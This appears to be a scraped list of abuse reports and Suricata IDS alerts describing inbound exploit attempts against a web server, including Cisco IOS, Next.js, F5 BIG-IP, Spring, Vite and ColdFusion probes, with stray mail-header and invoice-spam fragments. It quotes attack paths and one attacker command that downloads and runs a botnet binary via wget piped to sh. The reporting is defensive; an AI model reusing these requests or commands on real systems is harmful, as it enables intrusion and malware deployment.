Port scan followed by Cisco IOS HTTP Server exploit attempt
(CVE-2001-0537). GET /level/15/exec/-/ ...
show morePort scan followed by Cisco IOS HTTP Server exploit attempt
(CVE-2001-0537). GET /level/15/exec/-/sh/run/CR sent to port 443,
attempting unauthenticated command execution (privilege level 15).
Detected by Suricata rule ET WEB_SERVER SID:2010623.
Request returned HTTP 400 - attack unsuccessful.
show less
IP address: 45.135.193.131
Categories: 21 (Web App Attack), 15 (Hacking)
Timestamp: 2026-04-29T0 ...
show moreIP address: 45.135.193.131
Categories: 21 (Web App Attack), 15 (Hacking)
Timestamp: 2026-04-29T02:45:52+0200
This IP attempted a Next.js Server Action Remote Code Execution exploit (CVE-2025-29927 / Next.js _response prototype chain poisoning) against our server at x.x.x.x:443.
The attacker sent a crafted multipart/form-data POST request containing a serialized RSC payload designed to invoke Node.js child_process.execSync() via constructor chain manipulation. The payload used echo $((41*271)) as a canary command to verify RCE. Output exfiltration was attempted via a NEXT_REDIRECT digest to /x?out=<result>.
Additional spoofed headers were present: X-Forwarded-For: 211.239.160.141, X-Originating-IP: 121.50.6.77, X-Real-IP: 4.231.125.124.
Suricata IDS triggered on: SID 2221035 β SURICATA HTTP Request excessive header repetition. Flowbits: ET.Evil, ET.DROPIP.
The server responded with HTTP 400. Source port: 49724.
show less
Observed automated exploit attempt targeting F5 BIG-IP management interface.
The attacker sent a ...
show moreObserved automated exploit attempt targeting F5 BIG-IP management interface.
The attacker sent a POST request to:
/mgmt/tm/util/bash
This is associated with CVE-2022-1388 (F5 BIG-IP authentication bypass).
Payload included a command to download and execute a remote binary using wget:
wget http://161.97.148.194/nullnet_bin_dir/nullnet_load.mips -O- | sh
This indicates an attempt to deploy malware (likely IoT/MIPS botnet).
Traffic was detected by IDS (Suricata). No successful compromise observed.
Timestamp: 2026-04-10 03:22:24 (UTC+2)
Target: internal host (x.x.x.x)
Protocol: HTTP POST over TCP/443
show less
ET WEB_SERVER Likely Malicious Request for /proc/self/environ [**] [Classification: Web Application ...
show moreET WEB_SERVER Likely Malicious Request for /proc/self/environ [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.253.248.169:44500 -> x.x.x.x:443
show less
ET WEB_SPECIFIC_APPS Spring Framework FileSystemResource Path Traversal (CVE-2024-38816) [**] [Class ...
show moreET WEB_SPECIFIC_APPS Spring Framework FileSystemResource Path Traversal (CVE-2024-38816) [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 45.135.194.49:19814 -> x.x.x.x:443
show less
ET WEB_SPECIFIC_APPS React Server Components React2Shell Unsafe Flight Protocol Property Access (CVE ...
show moreET WEB_SPECIFIC_APPS React Server Components React2Shell Unsafe Flight Protocol Property Access (CVE-2025-55182)
show less
Received: from sv125.wadax-sv.jp (sv125.wadax-sv.jp [153.123.7.90])
by svpm07.wadax-sv.jp (Proxmox ...
show moreReceived: from sv125.wadax-sv.jp (sv125.wadax-sv.jp [153.123.7.90])
by svpm07.wadax-sv.jp (Proxmox) with ESMTPS id 44641834528
for <[email protected]>;
show less
ET WEB_SERVER ColdFusion componentutils access [**] [Classification: Web Application Attack] [Priori ...
show moreET WEB_SERVER ColdFusion componentutils access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 172.105.246.139:49028 -> x.x.x.x:443
Automated scan detected. The IP attempted to access a known vulnerable
ColdFusion endpoint: /CFIDE/componentutils/ via HTTPS (curl/7.54.0).
This is a typical probe for ColdFusion exploitation or enumeration.
Activity flagged by IDS.
show less
ET HUNTING Suspicious Chmod Usage in URI (Inbound) [**] [Classification: Attempted Administrator Pri ...
show moreET HUNTING Suspicious Chmod Usage in URI (Inbound) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 87.121.84.116:37242 -> x.x.x.x:443
show less
ET WEB_SPECIFIC_APPS Vite Arbitrary File Read Via raw parameter (CVE-2025-30208) [**] [Classificatio ...
show moreET WEB_SPECIFIC_APPS Vite Arbitrary File Read Via raw parameter (CVE-2025-30208) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 5.189.141.59:34304 -> x.x.x.x:443
show less
This notice is to inform you that your invoice number xxxxxxxxxxxxxx is OVERDUE. xxxxxxxxx.COM expir ...
show moreThis notice is to inform you that your invoice number xxxxxxxxxxxxxx is OVERDUE. xxxxxxxxx.COM expired on 02 October 2025 is SUSPENDED.
show less